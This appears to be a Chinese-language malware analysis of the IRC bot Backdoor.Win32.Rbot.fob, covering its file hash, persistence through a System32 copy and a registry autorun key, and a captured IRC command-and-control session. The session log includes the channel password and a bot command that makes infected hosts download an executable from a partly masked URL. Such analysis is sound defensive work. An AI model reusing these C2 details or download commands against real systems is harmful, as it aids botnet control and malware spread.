Backdoor.Win32.Rbot.fob分析
一、 病毒标签:病毒名称: Backdoor.Win32.Rbot.fob
病毒类型: 后门
文件 MD5: 45D0455398BD893176EB34C4B319D618
公开范围: 完全公开
危害等级: 4
文件长度: 506,880 字节
感染系统: Windows98以上版本
加壳类型: Themida|WinLicense V1.9.2.0-> Oreans Technologies *
二、 病毒描述:
该病毒运行后,复制自身到%System32%目录下,添加注册表自动运行项以随机引导病毒体;连接网络下载病毒文件,病毒运行后自我删除,
此病毒为一个利用Windows平台下IRC协议的网络蠕虫,受感染用户可能会被操纵进行Ddos攻击、远程控制、发送垃圾邮件、创建本地Tftp、
下载病毒文件等行为。
三、 原样本行为分析:
本地行为:
复制自身到 %system32% 文件夹下
gwbuahihk.exe
2、新增注册表
注册表值: "Winds Sersc Agts"
类型: REG_SZ
值: "zxnyjgzyu.exe"
注册表值: "Winds Sersc Agts"
类型: REG_SZ
值: "zxnyjgzyu.exe"
网络行为:
协议:TCP
连接服务器名:irc.priv****t.com
域名或IP地址:
209.250.232.2***:7000
加入的 IRC 频道名:
#FAAK#
用户名:dcxvtfdxls (随机小写字母)
密码:9400002290
对目标主机的操作:
/*昵称*/
NICK CHN|9400002290
/*欢迎信息*/
:irc.priv****.com NOTICE AUTH
:*** Looking up your hostname...
:irc.priv****.com NOTICE AUTH
:*** Couldn't resolve your hostname
:using your IP address instead
:irc.priv****.com 001 CHN|9400002290
:irc.priv****.com 002 CHN|9400002290
: M0dded by uNkn0wn Crew
:irc.priv****.com 003 CHN|9400002290
:irc.priv****.com 004 CHN|9400002290
:www.uNkn0wn.eu - iD@uNkn0wn.eu
:irc.priv****.com 005 CHN|9400002290
:irc.priv****.com 005 CHN|9400002290
:irc.priv****.com 005 CHN|9400002290
/*设置用户属性与加入房间及返回相关信息*/
:irc.priv****.com 422 CHN|9400002290
:MOTD File is missing
:CHN|9400002290 MODE CHN|9400002290 :+iwG
:irc.priv****.com 302
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
:CHN|9400002290!dcxvtfdxls@219.147.182.*** JOIN :#FAAK#
:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
:irc.priv****t.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.***
:irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.***
:irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.***
/*加入房间#kok6*/
JOIN #FAAK# saad.
/*用户信息显示*/
USERHOST CHN|9400002290
:irc.priv****.com 302 CHN|9400002290 :CHN|9400002290=+dcxvtfdxls@219.147.182.***
/*连接网络下载病毒*/
:irc.priv****.com 332 CHN|9400002290 #FAAK# :.jp]de100 http://members.ly***.co.uk/abosal7/usb.exe sty.exe
:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
/*服务器发送连接响应*/
PING :irc.priv****.com
/*回应服务器*/
PONG :irc.priv****.com
/*加入房间*/
JOIN #FAAK# saad.
2、连接网络下载病毒文件:
协议:TCP
域名或IP地址:http://members.l****.co.uk (213.193.4.**)
端口:80
对目标主机的操作:下载病毒文件
http://members.ly****.co.uk/abosal7/usb.exe 注1:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,
windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%= C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
注2:与IRC服务器的交互信息中,符号“/**/”内的数据是分析员对下一行或几行的注释信息,非为与服务器的交互信息内容。
页:
[1]